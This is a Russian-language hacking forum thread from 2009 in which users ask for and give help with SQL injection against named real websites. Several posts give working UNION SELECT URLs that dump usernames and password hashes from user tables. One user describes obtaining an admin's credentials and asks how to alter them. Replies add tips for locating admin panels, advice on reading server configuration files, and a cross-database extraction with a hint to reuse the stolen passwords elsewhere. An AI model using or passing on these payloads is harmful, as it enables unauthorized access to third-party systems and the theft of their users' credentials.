Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    если при подстановки в параметарезированный линк кавычки появляется надпись: An error occurred on the server when processing the URL. Please contact the system administrator. Означет ли это, что во всех остальных параметрах будет точно такая же надпись?

    П.С. С конструкцией and ошбки не выдает,но обычные страницы показывает.

    И еще один вопрос, если при подстановки кавычки появляется пустая страница, то как(кроме запросаand и метода вычислений) заставить вывести имя субд и т.д.?
     
    #7741 jecka3000, 26 Jun 2009
    Last edited: 26 Jun 2009
  2. XXXXXX

    XXXXXX New Member

    Joined:
    3 Jun 2009
    Messages:
    24
    Likes Received:
    1
    Reputations:
    -5
    после этой команды concat_ws(0x3a,LOGIN) я вижу логины пользователей через запятую.
    Как сделать так что бы логины пользователей отображались в столбик? тоесть следущий логин начинался с новой строки.
     
    #7742 XXXXXX, 27 Jun 2009
    Last edited: 27 Jun 2009
  3. xa-xa89

    xa-xa89 Elder - Старейшина

    Joined:
    17 May 2008
    Messages:
    108
    Likes Received:
    27
    Reputations:
    2
    не знаю почему через кому...должно по идеи через двоеточие,но что б в столбик
    попробуй concat_ws(0x0a,LOGIN)
     
  4. XXXXXX

    XXXXXX New Member

    Joined:
    3 Jun 2009
    Messages:
    24
    Likes Received:
    1
    Reputations:
    -5
    по данному адресу id=1+union+select+1,2,3,4,concat_ws(0x3a,USERNAME,PASSWORD)6,7,8,9,10+from+USERS+--+ я вижу логин и пасс админа. я его знаю, но админку у него найти так и не смог.
    как мне через скул поменять ему пасс.
     
  5. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    concat_ws('<br>',LOGIN)
     
  6. XXXXXX

    XXXXXX New Member

    Joined:
    3 Jun 2009
    Messages:
    24
    Likes Received:
    1
    Reputations:
    -5
    немного непонял, ну если колонка PASSWORD , а таблица USERS.
     
  7. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    найти пшпмайадмин и там поменять
     
  8. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    XXXXXX, concat_ws('<br>',LOGIN)
    это чтобы в столбик было
    select concat_ws('<br>',LOGIN,PASSWORD) from USERS
     
  9. XXXXXX

    XXXXXX New Member

    Joined:
    3 Jun 2009
    Messages:
    24
    Likes Received:
    1
    Reputations:
    -5
    вот именно, я немогу найти админку. все возможные варианты перебрал, неподходят.
    Так как через скул?
     
  10. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    никак
     
  11. M.W.N.N.

    M.W.N.N. Member

    Joined:
    5 Jan 2009
    Messages:
    173
    Likes Received:
    78
    Reputations:
    6
    Дай ссылку в пм, от делать нечего ща поищу админку мож и найду
     
  12. XXXXXX

    XXXXXX New Member

    Joined:
    3 Jun 2009
    Messages:
    24
    Likes Received:
    1
    Reputations:
    -5
    тогда извеняюся, я думал что через скул модно добавить, изменить данные.
    жаль что нельзя.
     
  13. XXXXXX

    XXXXXX New Member

    Joined:
    3 Jun 2009
    Messages:
    24
    Likes Received:
    1
    Reputations:
    -5
    Есть ли брут для поиска админки, что бы автомотически перебирал путь к админки по словарю
     
    #7753 XXXXXX, 27 Jun 2009
    Last edited: 27 Jun 2009
  14. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196

    Смотря какая скуль - если в select - то тока читать, если в update или в insert - то изменять и вставлять
     
  15. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    что можно узнать полезного из файла /etc/httpd/conf/httpd.conf ???
     
  16. AlexSatter

    AlexSatter Member

    Joined:
    29 Jan 2009
    Messages:
    303
    Likes Received:
    92
    Reputations:
    33
    все настройки веб сервера, а именно:
    пути, где располагаются сайты, модули которые подключены к веб серверу, настройки пхп, перла и так далее и тому подобное; куда приинклудены дополнительные настройки, такие как виртуальные хосты, и так далее и тому подобное.
     
  17. --StraNger--

    --StraNger-- Member

    Joined:
    4 Jan 2009
    Messages:
    63
    Likes Received:
    57
    Reputations:
    5
    если хочеш подробнее то посмотри здесь
    http://dklab.ru/doc/apache/httpd.conf.html
     
  18. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    подскажите у меня руки кривые или вывода нет??
    http://www.emag.ru/pr.php?pr=-10+union+select+1,concat_ws(char(58),username,user_password),3,4,5,6,7,8,9,10+FROM+phpbb_users+limit+5,1000
     
  19. molotovkeyt

    molotovkeyt Member

    Joined:
    2 Nov 2008
    Messages:
    2
    Likes Received:
    8
    Reputations:
    -1
    мега шоп, с ПР5. помогите раскрутить.
    при попытках присвоить переменной productid значения -1 или 99999999999 или 1+and+1=1 редиректит на страницу "acess denied"
    http://store.awn.com/product.php?productid=15'
     
  20. bons

    bons Elder - Старейшина

    Joined:
    20 Dec 2007
    Messages:
    286
    Likes Received:
    121
    Reputations:
    21
    таблица phpbb_users находится в базе данных SC:
    Code:
    http://www.emag.ru/pr.php?pr=-10+union+select+1,TABLE_SCHEMA,3,4,5,6,7,8,9,10+from+information_schema.tables+where+table_name=char(0x70687062,0x625f7573,0x657273)
    причем доступа туда нет. Но легко можно прочитать записи из таблицы phpbb_users1, что в базе данных acom:
    Code:
    http://www.emag.ru/pr.php?pr=-10+union+select+1,concat(username,0x3a,user_password),3,4,5,6,7,8,9,10+from+acom.phpbb_users1+limit+1,1
    может эти пароли куда-то и подойдут ;)
     
Thread Status:
Not open for further replies.